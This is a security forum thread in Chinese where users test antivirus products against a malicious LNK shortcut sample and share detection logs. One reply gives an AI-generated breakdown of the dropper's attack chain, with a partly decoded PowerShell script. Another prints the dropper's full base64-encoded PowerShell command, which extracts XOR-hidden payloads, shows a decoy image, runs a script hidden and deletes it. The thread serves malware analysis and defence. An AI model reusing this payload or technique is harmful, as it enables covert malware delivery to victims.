查看: 363|回复: 9
收起左侧

[病毒样本] APT 1x

[复制链接]
吃瓜群众第123位
发表于 昨天 21:11 | 显示全部楼层
Bitdefender Free Scan kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Loyisa
发表于 昨天 21:30 | 显示全部楼层
Elastic

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
浦北光
发表于 昨天 21:41 | 显示全部楼层
卡巴解压杀

事件: 检测到恶意对象
用户: WIN-KKPHI5K2UNM\pubeilight
用户类型: 发起者
应用程序名称: explorer.exe
应用程序路径: C:\Windows
组件: 文件反病毒
结果描述: 检测到
类型: 木马
名称: HEUR:Trojan.Multi.Powecod.n
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402.lnk
对象路径: C:\Users\pubeilight\AppData\Local\Temp\Rar$DRb23424.36078.rartemp
对象的 MD5: E57A461DEAA974EA13628BD4885165B4
原因: 专家分析
数据库发布日期: 今天,2026/4/7 20:45:00

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
z80405789
发表于 昨天 21:42 | 显示全部楼层
本帖最后由 z80405789 于 2026-4-7 22:17 编辑

LlmAntivirus 威胁分析报告
═══════════════════════════════════════════════════════

⚠ 声明:本检测结果由纯 AI 生成检测技术提供(主 Opus 4.6,
  GPT 5.4、小米 MiMo v2 Pro free 辅助),以测试 AI 写代码
  能力极限为目标。结果仅供参考,请注意甄别。

文件名:     aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402.lnk
路径:       C:\Users\hfgh\Desktop\新建文件夹 (3)\aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402.lnk
SHA-256:    aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402
大小:       42.8 KB
类型:       EXE x86
扫描时间:   2026-04-07 22:11:15

风险等级:   高危 (Critical)
启发式评分: 95.0
处置动作:   Quarantine
检测引擎:   签名引擎 (确定性检出)
扫描耗时:   

── 威胁摘要 ──
已检出威胁: TrojanDropper:Win32/LNK_Dropper.Y!sig

── 判定依据 ──
  🧠 AI引擎判定恶意 (置信度 100%)
     模型: signature_engine
  📊 文件熵值偏高: 7.321
     部分数据可能被加密。正常文件熵值通常在 5.0-7.0 之间。
  ☢️ 匹配 7 条恶意特征规则
     LNK_PS_Hidden(dropper) [95分]
LNK_MultiStage(dropper) [95分]
LNK_PS_Download(downloader) [90分]
LNK_Oversized_PS(dropper) [90分]
LNK_FolderSpoof(dropper) [85分]
PS_HiddenEncoded(evasion) [85分]
Script_HiddenExec(evasion) [80分]
  🔎 1 处结构异常
     签名检出: TrojanDropper:Win32/LNK_Dropper.Y!sig

── 启发式引擎评分 ──
  熵分析:     15.0
  API组合:    0.0
  字符串模式: 0.0
  文件异常:   0.0

── 检测到的异常 ──
  • 签名检出: TrojanDropper:Win32/LNK_Dropper.Y!sig

── 建议操作 ──
签名引擎确认威胁。建议立即隔离或删除此文件。

═══════════════════════════════════════════════════════
报告生成时间: 2026-04-07 22:11:30
Generated by LlmAntivirus

⚠ 声明:本检测结果由纯 AI 生成检测技术提供(主 Opus 4.6,GPT 5.4、
小米 MiMo v2 Pro free 辅助),以测试 AI 写代码能力极限为目标。
结果仅供参考,请注意甄别

opus4.6分析
完整解码了隐藏的 PowerShell 载荷。这是一个精心构造的恶意快捷方式文件。

攻击链分析
用户双击"文件夹" → 隐藏PowerShell启动 → 从LNK自身提取两个载荷 → 显示诱饵图片 → 后台执行恶意脚本 → 自删除痕迹
解码后的恶意脚本:
powershell
# 1. 定位自身 LNK 文件
$eYW = Join-Path $Fie ('1633102209575.jpg.lnk');

# 2. XOR解密提取函数 — 从LNK文件体内嵌入的二进制数据中提取载荷
function pl {
    param($DF, $Cm, $mix, $Yim)   
    # 从LNK文件指定偏移读取字节 → XOR解密 → 写入文件
    $adz[$Ci3] = $adz[$Ci3] -bxor $mix;
}

# 3. 载荷A: 诱饵图片 (迷惑受害者)
#    偏移8192, 大小23198字节, XOR密钥250
pl 8192 23198 250 "$TEMP\1633102209575.jpg"
Start-Process -FilePath $pK;   # 打开图片给用户看

# 4. 载荷B: 真正的恶意脚本 (隐藏执行)
#    偏移31390, 大小12394字节, XOR密钥138
pl 31390 12394 138 "$TEMP\<随机文件名>.ps1"
powershell -noprofile -windowstyle hidden -executionpolicy bypass -file $ZI;

# 5. 自删除 — 消除痕迹
Remove-Item -Path $ZI -Force;
恶意特征汇总
指标        详情
文件类型        Windows 快捷方式 (.lnk)
大小        43,784 字节 (正常 LNK 约 1-2KB,异常膨大)
图标伪装        SHELL32.dll,70 — 伪装成文件夹图标
执行方式        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
载荷隐藏        两段 XOR 加密数据嵌入 LNK 文件尾部
载荷A        诱饵 JPG 图片 (偏移 8192, 23KB) — 迷惑受害者
载荷B        恶意 PS1 脚本 (偏移 31390, 12KB) — 真实木马
反取证        执行后自动删除恶意 PS1 文件
变量混淆        使用随机变量名 + 大小写混淆 (如 rECURSE, SILeNtLyConTinuE)
判定
⛔ 危险等级: Critical (100分)

这是一个典型的 LNK 钓鱼木马投放器,常见于银狐/SilverFox、QakBot 等攻击活动。攻击流程:

伪装成文件夹引诱双击
隐藏启动 PowerShell 绕过执行策略
从自身提取 XOR 加密的诱饵图片 + 恶意脚本
展示诱饵图片让受害者以为打开了正常文件
后台静默执行真正的恶意载荷
自动删除痕迹
建议: 立即删除该文件,不要双击运行。检查系统是否已被感染。



white_paper
发表于 昨天 22:45 | 显示全部楼层
安天智甲扫描miss 双击后拦截

威胁等级:威胁
检测引擎:威胁行为检测规则
操作类型:启动进程
行为描述:发现恶意shell命令规则命中事件
规则ID:wop0060008
---------------------------------------------
进程ID:8028
进程路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
文件MD5:6726185B70B5ADF05E8A1A1DF82EBF30
运行参数:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABGAGkAZQAgAD0AIABpAGYAIAAoACQAZQBuAHYAOgBMAE4ASwBfAEYATwBMAEQARQBSACkAIAB7ACAAJABlAG4AdgA6AEwATgBLAF8ARgBPAEwARABFAFIAIAB9ACAAZQBsAHMAZQAgAHsAIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACAAfQA7AA0ACgAkAGUAWQBXACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABGAGkAZQAgACgAJwAxADYAMwAzADEAMAAyADIAMAA5ADUANwA1AC4AagBwAGcALgBsAG4AawAnACkAOwANAAoAJABCAEkARQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAA7AA0ACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAJABlAFkAVwApACkAIAB7AA0ACgAgACAAIAAgACQASgAxAEcAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAQgBJAEUAIAAtAHIARQBDAFUAUgBTAEUAIAAtAEUAUgByAE8AcgBhAEMAVABJAG8ATgAgAFMASQBMAGUATgB0AEwAeQBDAG8AbgBUAGkAbgB1AEUAIAB8ACAAdwBoAGUAcgBlAC0ATwBiAEoARQBjAHQAIAB7ACAAJABfAC4AbgBBAG0ARQAgAC0AZQBRACAAJwAxADYAMwAzADEAMAAyADIAMAA5ADUANwA1AC4AagBwAGcALgBsAG4AawAnACAAfQAgAHwAIABzAG8AUgB0AC0AbwBiAEoARQBDAHQAIABsAEEAUwBUAFcAUgBpAFQARQB0AEkATQBFACAALQBEAEUAcwBDAGUAbgBkAEkAbgBHACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYASQByAHMAVAAgADEAOwANAAoAIAAgACAAIABJAGYAIAAoACQASgAxAEcAKQAgAHsAIAAkAGUAWQBXACAAPQAgACQASgAxAEcALgBmAHUATABMAE4AYQBtAEUAOwAgAH0AIABlAGwAcwBlACAAewAgAGUAeABpAHQAOwAgAH0ADQAKAH0AOwANAAoAZgB1AG4AYwB0AGkAbwBuACAAcABsACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAkAEQARgAsACAAJABDAG0ALAAgACQAbQBpAHgALAAgACQAWQBpAG0AKQAgACAAIAAgAA0ACgAgACAAIAAgACQAYQBkAHoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAJABDAG0AOwAgAA0ACgAgACAAIAAgACQAbgBxAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJABlAFkAVwApADsADQAKACAAIAAgACAAJABuAHEAcwAuAFMAZQBlAGsAKAAkAEQARgAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBFAEcASQBOACkAOwANAAoAIAAgACAAIAAkAG4AcQBzAC4AUgBlAGEAZAAoACQAYQBkAHoALAAgADAALAAgACQAQwBtACkAOwANAAoAIAAgACAAIAAkAG4AcQBzAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAgACAAIAAgAGYATwBSACAAKAAkAEMAaQAzACAAPQAgADAAOwAgACQAQwBpADMAIAAtAEwAVAAgACQAQwBtADsAIAAkAEMAaQAzACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAYQBkAHoAWwAkAEMAaQAzAF0AIAA9ACAAJABhAGQAegBbACQAQwBpADMAXQAgAC0AYgB4AG8AcgAgACQAbQBpAHgAOwANAAoAIAAgACAAIAB9ADsADQAKACAAIAAgACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABZAGkAbQAgACQAYQBkAHoAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUAOwANAAoAfQA7AA0ACgAkAHAASwAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAQgBJAEUAIAAoACcAMQA2ADMAMwAxADAAMgAyADAAOQA1ADcANQAuAGoAcABnACcAKQA7AA0ACgBwAGwAIAA4ADEAOQAyACAAMgAzADEAOQA4ACAAMgA1ADAAIAAkAHAASwA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAASwA7AA0ACgAkAFoASQAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAQgBJAEUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAIAArACAAJwAuAHAAcwAxACcAKQA7AA0ACgBwAGwAIAAzADEAMwA5ADAAIAAxADIAMwA5ADQAIAAxADMAOAAgACQAWgBJADsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwAHIAbwBmAGkAbABlACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AZgBpAGwAZQAgACQAWgBJADsADQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAWgBJACAALQBGAG8AcgBjAGUAOwA=
处置方式:阻止启动

父进程信息:
进程ID:5344
操作进程:C:\Windows\explorer.exe
文件MD5:02280F4613E3D8EB6579D79AB7A182CA
运行参数:C:\Windows\Explorer.EXE
处置方式:未处置

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
white_paper
发表于 昨天 23:01 | 显示全部楼层
江民赤豹解压杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 昨天 23:09 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
white_paper
发表于 昨天 23:19 | 显示全部楼层
360杀毒扫描miss 360安全卫士报毒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fast777
发表于 10 小时前 | 显示全部楼层
下载完,McAfee就杀了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-8 12:22 , Processed in 0.082696 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表